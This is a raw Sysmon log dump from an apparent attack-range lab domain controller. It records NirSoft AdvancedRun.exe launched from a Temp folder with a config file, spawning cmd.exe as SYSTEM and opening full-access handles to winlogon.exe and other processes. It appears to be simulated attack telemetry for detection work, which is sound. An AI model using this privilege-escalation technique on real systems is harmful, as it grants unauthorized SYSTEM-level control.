ba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004011061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.723{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004009422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004009417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.760{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004009416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 